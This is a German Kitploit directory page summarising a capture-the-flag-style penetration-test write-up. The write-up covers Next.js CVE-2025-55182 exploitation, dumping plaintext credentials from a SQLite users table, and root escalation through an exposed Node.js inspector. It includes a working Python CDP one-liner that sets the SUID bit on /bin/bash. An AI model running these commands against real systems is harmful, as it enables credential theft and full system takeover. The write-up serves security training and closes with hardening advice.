Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-55182 — Technischer Penetrationstest-Bericht, der die Ausnutzung von CVE-2025-55182 in Next.js, das Sammeln von Zugangsdaten aus SQLite und die Privilegienausweitung über den Node.js-Inspector zur Erlangung von Root-Zugriff demonstriert. | Kitploit
Tools/GitHubGitHub/chrisbarack/cve-2025-55182
Privilege EscalationAufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubchrisbarack/cve-2025-55182

cve-2025-55182

Technischer Penetrationstest-Bericht, der die Ausnutzung von CVE-2025-55182 in Next.js, das Sammeln von Zugangsdaten aus SQLite und die Privilegienausweitung über den Node.js-Inspector zur Erlangung von Root-Zugriff demonstriert.

Repository anzeigen
vor 9h 46mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Penetration-Testing-Writeup: Next.js RCE & Node.js Inspector Privilege Escalation

Dieser technische Writeup beschreibt den Ausnutzungspfad zur Kompromittierung eines Zielsystems, das eine verwundbare Next.js-Webanwendung hostet, den Erhalt des initialen Zugriffs über erbeutete Zugangsdaten sowie die Ausnutzung eines fehlkonfigurierten lokalen Node.js-V8-Inspectors zur Root-Privilegieneskalation.

Phase 1: Externe Aufklärung & Web-Exploitation

Initiales Footprinting

Das Zielsystem hostet eine Next.js-Webanwendung, die auf den Standard-HTTP/HTTPS-Ports (80/443) läuft. Standardmäßige Verzeichnisenumeration und manuelle Analyse deuten darauf hin, dass die Anwendung eine Version ausführt, die für CVE-2025-55182 verwundbar ist.

Exploitation über Burp Suite

Um die Schwachstelle auszunutzen, fangen Sie den Anwendungsverkehr mit Burp Suite (oder Burp Repeater) ab und injizieren Sie einen maßgeschneiderten Exploit-Payload, der auf CVE-2025-55182 abzielt.

Datenbank-Erkennung

Nachdem Sie durch den Exploit Codeausführung und lokales Dateilesen erreicht haben, untersuchen Sie das Anwendungsquellverzeichnis. Die lokale SQLite-Datenbankdatei (database.db) befindet sich neben dem Hauptquellcode der Anwendung.

Phase 2: Extrahieren von Zugangsdaten & Initialer Zugriff

Untersuchen der Datenbank

Fragen Sie den Inhalt der Datenbankdatei ab oder dumpen Sie ihn, um gespeicherte Benutzerdatensätze zu extrahieren.

root@kitploit:~
sqlite3 database.db "SELECT * FROM users;"

Extraktion der Zugangsdaten

Lokalisieren Sie das Klartext-Passwort, das dem lokalen SSH-Benutzer engineer zugeordnet ist.

SSH-Login

Nutzen Sie die wiederhergestellten Zugangsdaten, um eine SSH-Sitzung mit dem Zielsystem aufzubauen:

root@kitploit:~
ssh engineer@<TARGET-IP>

Abrufen der User-Flag

Nach der Authentifizierung lesen Sie die User-Flag im Home-Verzeichnis:

root@kitploit:~
cat /home/engineer/user.txt

Phase 3: Privilegieneskalation über den Node.js-Inspector

Interne Port-Aufklärung

Prüfen Sie auf Dienste, die ausschließlich an die Loopback-Schnittstelle (127.0.0.1) gebunden sind, um interne Angriffsflächen zu identifizieren:

root@kitploit:~
netstat -tulnp

Ergebnis: Ein interner Node.js-Dienst lauscht aktiv auf dem lokalen Port 9229.

Entdecken der Debugger-UUID

Node.js-V8-Debug-Ports erfordern eine eindeutige Session-UUID für die WebSocket-Kommunikation. Fragen Sie den lokalen Discovery-Endpunkt mit curl und angehängtem /json ab:

root@kitploit:~
curl -s http://127.0.0.1:9229/json

Ausgabe:

root@kitploit:~
{
  "webSocketDebuggerUrl": "ws://127.0.0.1:9229/46a680a0-1cf5-4af4-9ce6-474f77329639"
}

Ausführen des Privilegieneskalations-Payloads

Da der Ziel-Node.js-Prozess mit Root-Rechten läuft, können Sie über Python und WebSockets eine Chrome-DevTools-Protocol-(CDP)-Runtime.evaluate-Nachricht senden, um das SUID-Bit auf /bin/bash zu setzen:

root@kitploit:~
python3 -c 'import websocket, json; ws = websocket.create_connection("ws://127.0.0.1:9229/<YOUR-UUID>"); ws.send(json.dumps({"id": 1, "method": "Runtime.evaluate", "params": {"expression": "process.mainModule.require(\"child_process\").execSync(\"chmod +s /bin/bash\")"}})); print(ws.recv()); ws.close()'

Wechsel in eine Root-Shell

Verifizieren Sie, dass /bin/bash nun über SUID-Berechtigungen verfügt (-rwsr-sr-x), und rufen Sie dann Bash unter Beibehaltung der Privilegien auf:

root@kitploit:~
ls -l /bin/bash
bash -p

Abrufen der Root-Flag

Navigieren Sie zum Home-Verzeichnis des Root-Benutzers, um die finale Flag zu erfassen:

root@kitploit:~
cd /root
cat root.txt

Die Absicherung von Umgebungen gegen diese Vektoren erfordert das Patchen von Webanwendungen, die für bekannte CVEs verwundbar sind, die ordnungsgemäße Einschränkung von Datenbankdateiberechtigungen sowie die Sicherstellung, dass Debug-Ports (wie der Node.js-Inspector auf Port 9229) in Produktionsumgebungen niemals exponiert oder ohne Authentifizierung zugänglich gelassen werden.

Tool herunterladen